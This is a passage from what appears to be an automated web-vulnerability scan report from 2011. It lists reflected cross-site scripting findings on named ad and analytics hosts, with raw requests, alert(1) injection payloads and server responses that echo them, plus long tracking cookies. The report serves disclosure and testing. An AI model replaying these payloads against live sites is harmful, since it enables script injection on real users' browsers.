Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:05:26 GMT
Age: 0
Connection: keep-alive
Content-Length: 6757

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',1);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0952ab;alert(1)//326c748cb10({"requiresContextualization":1,"requiresAdverts":1,"chunkKey":"10323:5df8b1e5a4074f05fec4903c8d524558:0ACD3C408E1D4BD0AFE6846EDF453A92:"});}catch(e){}
2.65. http://courier-journal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9b9"-alert(1)-"1a55f6daf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1304957022412&pagecl=32105&fv=10&muid=&refurl=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2FFEATURES07%2F305090030%2FMonday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&ipid=10323&jscallback=$iTXT.js.callback0&1d9b9"-alert(1)-"1a55f6daf1d=1 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:05:31 GMT
Age: 0
Connection: keep-alive
Content-Length: 6738

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
10);var undefined;if(null==$iTXT.glob.dbgParams||undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"1d9b9"-alert(1)-"1a55f6daf1d":"1","pagecl":"32105","fv":"10","ts":"1304957022412","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534
...[SNIP]...
2.66. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a929<a>0a36187bda8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /offer6a929<a>0a36187bda8/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 16:02:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1446
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
</b> Invalid controller specified (offer6a929<a>0a36187bda8)</p>
...[SNIP]...
2.67. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fd56<a>0305c79b333 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /offer/feed3fd56<a>0305c79b333/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 16:02:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Set-Cookie: ipinfo=173.193.214.243%7C2915161843%7CUS%7C; expires=Mon, 16-May-2011 16:02:37 GMT; path=/; domain=.baronsoffers.com
Content-Length: 1756
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(23) "feed3fd56<a>0305c79b333"
["q"]=>
...[SNIP]...
2.68. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3e53<img%20src%3da%20onerror%3dalert(1)>033dd735ca1 was submitted in the REST URL parameter 3. This input was echoed as c3e53<img src=a onerror=alert(1)>033dd735ca1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /offer/feed/qc3e53<img%20src%3da%20onerror%3dalert(1)>033dd735ca1/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 16:02:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1748
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(4) "feed"
["qc3e53<img src=a onerror=alert(1)>033dd735ca1"]=>
...[SNIP]...
2.69. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c875d<img%20src%3da%20onerror%3dalert(1)>aa0bd57f800 was submitted in the REST URL parameter 4. This input was echoed as c875d<img src=a onerror=alert(1)>aa0bd57f800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /offer/feed/q/c875d<img%20src%3da%20onerror%3dalert(1)>aa0bd57f800=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 16:02:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1709
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(4) "feed"
["q"]=>
string(45) "c875d<img src=a onerror=alert(1)>aa0bd57f800="
["module"]=>
...[SNIP]...
2.70. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload fe24b<script>alert(1)</script>8757376e56b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=B08725fe24b<script>alert(1)</script>8757376e56b HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; rsi_segs_1000000=pUP148OheHIQT7uItGF25jD9Qs21FubrqKatUkMCrzQ0ubO+9OJEqMBPaqLOnUT/0qbgJHZjnVOLUUdh6W5yO8TAHKWrnEIdrGwwkcb4cnFgczDjCdEcEfCAH9QV9gQfhWUU9eUW+1FmHy81movjmb0OshD6JD75y82v21Zpze/U7TG71KUw/EK8Yk4YFbDkYA9y3wz0G7nvTcfLT/GhJZbKN+yRVh6IJYpuMdXAy8638GeZS/vL4PGyPCK7mYGQ19yvvEn6ODRVpB63vByr0ab/JGpwhV2j7V2Opbn62TlTV9Ep9v/KTJXEEh7xjIfNol2mtVQjP2qXlQ+5DYZWBRe8B3uT46yKVM63Ue8Iu5VB+nAPlUpvE0jiE6Qs1H1n4r/e/jSmPGPvWra/g1Iw52oGpr3tDAShXZ6leem6wkl7YAlKXY0ikpCZDduaQh8UBxHMax7jHTGLCHPzt/9KYUF1eK3tc2bRu/gWIv3wnbCQR0aqAnlKC5c4DCTSJDvyAlCmhJOuf6ulIfr+YiVUcmyunKjbPTY9z5DoFVXvb00tKIO72DJ2R8xXrHfHLknf1Ii54LJ0bnhi+0Drv+J010Vz7CoOOk2kLw==; udm_0=MLv39C8JZjpr557JwPKJHPJjVm4nwNDnfaGGn5a6X5EAwsYAqmLCTArLHxzvFq5u+Lwe27lFrnW5WnLyYnzoo2vLyODpQWYkRuTiRRYobugWhdDPREK16g3CZk+J188bp8ISFFatAM3Pns+SxZjcme0C5dGxc6XjkDqd2T0pa9dLHJ2FzI7NAP8Y3TWU6n79EJfmzJu3rY1n/+9COKH0vUGz5d+gBTEXGF9NJj5hemDBJLfP5Mve+4eWzxiCmeffHI22qESrtLERd9bn/jcndKQB6uiKK4So7g9BbnKF0XRvZf92uEkD8qlmEHlK4lIeI2xMlprKnNbUbSb3joEj3FnW5JiRUPydReZtf6pQR8m3Ri7k5yDwmeNfkO8orvSZb6NKA+T1I2i2V6XQzYiQYT7eMO3GqA60kr6kRwLqPUZJh32H0PqK8oG4V09T9ctbP5mf0Cpnf7vM/uRm82tz4tfks3zBm+3VbTk8I2zhyWS6eclEJACmrM7XMGAWGJq9IYqsF5S5jpHtbcXPrz3rT2u/LIbFzVO89TolW1hVi5tuk1KUABx5m8qzMPhX0+EPauUMSwzeirm98AcAwtXpvonBgEzaZNv2Urt4Jvxfo27TOyFVxFu1bqmEB8413oNdEsW2gdv/YdJUYkcRYMX2OouTQyfY7vz4Tk1pzbkZa4TH2fiVXxOBEHyM1PbD7qSJcQNPo/dKaL6Xo4fqVV4AgIYlpYTjce9ZivcrOnjpRG7y1agYfbTDamrwnGARUfl6KEBM2ZiTeG2Th7ZCT0C8b1UsKmbxGVTaXBZ0wNsjxp+YZtltZqx3sMJbKGl2M6JUT6+b1g+/D1somt33fPhno2ShrlBRxI6Xv1/126vVfr+8VkGpzsDKbLnLLRElobnNFfygMUp+MSlGp0ZpUXAvzJAJe6qk57o+tkwtb6z5N8ucTzNpi24DHsutM6dmIDxOQAEglp2zZKqN9AIYM1hElTbq+zc2ohzuOYi/5VTNmVJFdmfV8jGoZvYmCAQ6vc7v/bKs8HK5EM7lr6YKr1a2uMELEu4ITAE3gqlVLuvjVYDva/Vyw8YXKa6Rcxml6TjwSCRaUcVyyk4zt+bzX/O5hCc1ojBZDEcmWPNvSp54wrCDS4hVeNiCVinCDJG6X2Bjb2NCbb2UOFUa6jFXwyrlYAC2eXfnV/Mp/ECcH1f7yr2pCGP+gzOfRcb+maYO87HFqFqU4o0hCg0HRA0UycAov4CmqZEBFk9dU8+gDkkPGgmct04RsyVbsrfpoMoCycEvYtBXhDyOthaY+BDkp+ARJu6+rQnmkr7eDZA/vxRM/N95y1VMmE3Myc7FTLdYW9C2xtVHZuzUtN8T7qcO9QIsvEkMjKo+DNeeo4pM/11JcWfLwh92IBgieCHi9XyUEKsOLp7OEC8kbLOjAcAIQQTa7WkkQG8T3O/kM3JB9V9uND5mY70Sow7PaIYpx0O7Aoith2eiECyyl7+6y5j3d22MjOVScy+6Y7Ldz/U1I0iJwoYRzcFyf2mcYOebzis=; rsiPus_iGvR="MLsXrqEOZghv55B0Wrbc7mIPXB49BNftp5OEv0fvf7fzQBK+S1TAFqVh79Ap8K9CQv7xSBH8LiTh9hhmD7i6BBguBnlMaS1jefGU+vVjpS2gU9hnjC9P+dUWSXvJvTJpnYarHwBNKshMKjS5CCO5r6LK8KdPXJ6XR1DOuBII8Z2AqzuVmA+UsYgclQh4ju/K+qsRufUALW9Oek2qxZerG3GorElEAZGeDSYZJGkQMOLaObzdTOjUulVCjaj88GH7BzE4v/kTEIH1/eE5V9MhE9iLnCFPFRB9aLn/Ozhdv3Z48v89OB0IHPIuxXIAJo04tmoVq+R42rjsN5TXuiEsGb78a4fZM2unpYm6f8oP8hK1p5ZQJk/ZGP4tMp/PqsGlM7iAl8Rp95bU4BLFOcFYhsACD6TFN+LM/FYSvB0LB7HYsVZ+ehchR769R+3TqM7sYbzLR29a/dtWHBrPoIyZQBOknfZ+6jYp7MGXEudpkQjBodKbI+siujXWZNQX9tnTZ0pnS4cC1//2DoZaS0SN+kQPCxb/orqydF0NFnR3uPATeLmFO3x/vR8LbchXU05hk0QcKxy8/g0c33o1t/huBS/vV9hjEBcuKrXmlFtuH1TT0WsBKmzGgBvGE2HwKeZynSNTFjPDwrPstve1TwkZTsPPndu8Kx397TK0/gOy98bhtu2ZDSBEzSehMUdfjJiLjpqcK6n7+mTzb1aKnxkKja7IY5MDr8WxvY7cKOwv8dY7NnJLJ4RD5Mj2T1c1fefFvKuFm1C3rM2qrciDrKGRZDDQOAhTmlLLwD9msarcszUCfs2GJMn87tyK5N31rZqnu7fRkJMNmdy1SQ+41xVBMEkT+0nlNwdJc+mAM551ueudgRjBuwEMTrhY8Kljt8EubuEwd3xbTtsNff+y+H0Yi3lIa8GuU7vJUESX1nzMKYs5vXhLp/h6Rbuu4WgAni51T9HPpl6kuzpZb8kgZ+8jqi6iVBR3sJekgIgHw3pNoZXISztTME0jsbDXOsDMvVnuxOiTGf6FiHiIHHdsM1HJF+CPSkbR+15O6AIjiCpR88SsvdaUfw10+ImMhBrQ/g8TYFu/rjgNNos+OPxKVRLAe4NMYzOKuClppYjXRBNHLKtpR+KibNFfYbnw/I4GyoDIK/fA2Gt3L5u/CnI8LxLU"; rsi_us_1000000="pUMtIzlHMAYY1A3HkAz1jwtCTPvDvwQSU2eqPpzA6n4Wsm7TKYqfaBLrtKN68iFx8cqmHSK9eaFvyn1GBw+6xVpybHLaiq5FNZQFDVoCY880WC0bwmZ90V4ndE/SeN3B//stcmtll9Cg/ISKIvC6VZ9/POM8ONIILZmvPLG376XaN6IBlBj/HtaMxNqIHz6RpUXcFR6WQO/hKPe5ykaB4XpD8EiZoXxqsH6BnryjdDb/DZlpOBy7SHfLoJZ1hUMVAkby1CeDLhxWGwNF/Xo0wHrVXi3lQiad3uaxZC5CQwXl0UftlAYrM2Cf7Bq0Q71leNaXmYXCgsp58puMyYKOhpIyYy8rIczaKbL7xSxVWV5pyjTCpwl5khZbXqy3cl9aPSiblyFVUzoTNdDbP/Ufwaf5WxejCp2AYvYSAW1YISPXUfQIPkHLqOHgzL1Ycy+O2Tmj7NZC58RawGVEJyd+ZCovBKgFCQm7YqMYAiRBdcbVK1GyI7Kw8tiOs0erpnIilKw6JJ3ZGnP3lU7HzdrglwGlxfvR+i6XUlKbq9lMO+OvTy0Pcq8+TXMiy6SxCtVj0c9iVhgTav+qok/isEHRdALDF8Qc97MCaA5xhIof2nth2l8UJ7TzAZj633oH3fd1GDzCmvqoctSZ91Z+rQoLRnFNEaqq8M7RcRYtz62KTrVXBKwLyXioap9Dw7pICla4/bAo5SrutPrAfFFfUxRrihk3ZXQijldc8xotPMoQVq761R9i+mrzLwL0gE0tBVsImrybLZ7cq+QyYtg4YvKXUPEntPGj24XXFKvcdyEH0pys/E8pLx9zGCMAdo35gx6qg0EhW8z75pbR8o8aCEAgT4Ks9CAoGJE3Ej/dqvUUtXxeqgQ5ujM6Ql1mCM6/Qwxxvl0q9cZVDajvuH8CXXCwpRLVa+OCcXuBpI3Bzv1cBc743BUSdU0eMjMbkXv3VEDeAbmyxTziyoDjEfObahoaldHBm2FbkZAHWmWwcKoZMmsbafkBXNOwclU0cnawmcbz2uCqNX+tEkZyOVrKbOoDmk64AL9/i3A2DensXHKtxGg07Z04wZ/yzrKGKC0RZO8bJ0jDdXyjLCiuq4J5GNwVsEb60G9XHvEbzJtPEuIT6PBoLbGHsUcwbni34ugzA8tfeM7fmvZ95A7VVr34Ny83LTdjBOkGEjN49+ldxTHLbURKZQWpolAYtQK/I4zWM7TOmF15H/7IsxoGNtVOM7QD1+1vTo7QC9pEJ81x/3oSS1gv0+Uet9qOR1Ylglrlv8PJN8hqyhDwLX7uMP5C7O0NcKiwhuSVlsNUmf2oxUpkBlLNAIxxMTmoJPaHme5N7YGTl/+XWRoMBFcHq91a1o7+D3pERBQ1X8IWCUcdM/qNxu6dpx6mAko95U1I3nyf45XbvXv6Zo3KdRcK3M4r6F4+NPLgcrtUhjeR3iecAtiLwa7Z4JxfNiwAloqO2F4stPq4AfAW32Ytrts5pDN36oeWhZuFxPPC2Eits+S5bYSisliCOgfUnVwjGrLxhliGakbLW0E6210628qa+qhedum8DghgMpNap5FGZDB5GcG7bnf3AK5f89e7BTZcDQnkmbDTfaYVj/2tuUCsD/E="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 16:02:39 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 16:02:39 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:02:39 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "B08725FE24B<SCRIPT>ALERT(1)</SCRIPT>8757376E56B" was not recognized.
*/
2.71. http://lingows.appspot.com/bubble/ [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload f9e6d<img%20src%3da%20onerror%3dalert(1)>5f177f5c0b0 was submitted in the request_id parameter. This input was echoed as f9e6d<img src=a onerror=alert(1)>5f177f5c0b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

